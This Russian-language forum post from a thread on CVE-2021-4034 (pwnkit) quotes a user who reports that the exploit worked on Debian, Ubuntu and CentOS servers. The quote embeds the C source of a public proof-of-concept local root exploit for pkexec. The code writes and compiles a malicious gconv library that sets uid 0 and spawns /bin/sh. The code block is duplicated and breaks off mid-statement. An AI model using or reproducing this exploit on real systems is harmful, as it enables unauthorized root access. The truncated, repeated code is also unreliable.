Тема: CVE-2021-4034 aka pwnkit
Показать сообщение отдельно

  #7  
Старый 27.01.2022, 13:11
Ravenous
Guest
Сообщений: n/a
Провел на форуме:
44130

Репутация: 26
По умолчанию
[QUOTE="dooble"]
dooble said:

У меня другие результаты, на доступных серверах - сработало везде (где есть pkexec), на debian, ubuntu, centos.
Проверял
этим
.
И патчил.
Spoiler: test
[CODE]
Code:
/*
* blasty-vs-pkexec.c -- by blasty
* ------------------------------------------------
* PoC for CVE-2021-4034, shout out to Qualys
*
* ctf quality exploit
*
* bla bla irresponsible disclosure
*
* -- blasty // 2022-01-25
*/

#include
#include
#include
#include
#include
#include
#include

void fatal(char *f) {
perror(f);
exit(-1);
}

void compile_so() {
FILE *f = fopen("payload.c", "wb");
if (f == NULL) {
fatal("fopen");
}

char so_code[]=
"#include \n"
"#include \n"
"#include \n"
"void gconv() {\n"
" return;\n"
"}\n"
"void gconv_init() {\n"
" setuid(0); seteuid(0); setgid(0); setegid(0);\n"
" static char *a_argv[] = { \"sh\", NULL };\n"
" static char *a_envp[] = { \"PATH=/bin:/usr/bin:/sbin\", NULL };\n"
" execve(\"/bin/sh\", a_argv, a_envp);\n"
" exit(0);\n"
"}\n";

fwrite(so_code, strlen(so_code), 1, f);
fclose(f);

system("gcc -o payload.so -shared -fPIC payload.c");
}

int main(int argc, char *argv[]) {
struct stat st;
char *a_argv[]={ NULL };
char *a_envp[]={
"lol",
"PATH=GCONV_PATH=.",
"LC_MESSAGES=en_US.UTF-8",
"XAUTHORITY=../LOL",
NULL
};

printf("[~] compile helper..\n");
compile_so();

if (stat("GCONV_PATH=.", &st)
* ------------------------------------------------
* PoC for CVE-2021-4034, shout out to Qualys
*
* ctf quality exploit
*
* bla bla irresponsible disclosure
*
* -- blasty // 2022-01-25
*/

#include
#include
#include
#include
#include
#include
#include

void fatal(char *f) {
perror(f);
exit(-1);
}

void compile_so() {
FILE *f = fopen("payload.c", "wb");
if (f == NULL) {
fatal("fopen");
}

char so_code[]=
"#include \n"
"#include \n"
"#include \n"
"void gconv() {\n"
" return;\n"
"}\n"
"void gconv_init() {\n"
" setuid(0); seteuid(0); setgid(0); setegid(0);\n"
" static char *a_argv[] = { \"sh\", NULL };\n"
" static char *a_envp[] = { \"PATH=/bin:/usr/bin:/sbin\", NULL };\n"
" execve(\"/bin/sh\", a_argv, a_envp);\n"
" exit(0);\n"
"}\n";

fwrite(so_code, strlen(so_code), 1, f);
fclose(f);

system("gcc -o payload.so -shared -fPIC payload.c");
}

int main(int argc, char *argv[]) {
struct stat st;
char *a_argv[]={ NULL };
char *a_envp[]={
"lol",
"PATH=GCONV_PATH=.",
"LC_MESSAGES=en_US.UTF-8",
"XAUTHORITY=../LOL",
NULL
};

printf("[~] compile helper..\n");
compile_so();

if (stat("GCONV_PATH=.", &st)
 
Ответить с цитированием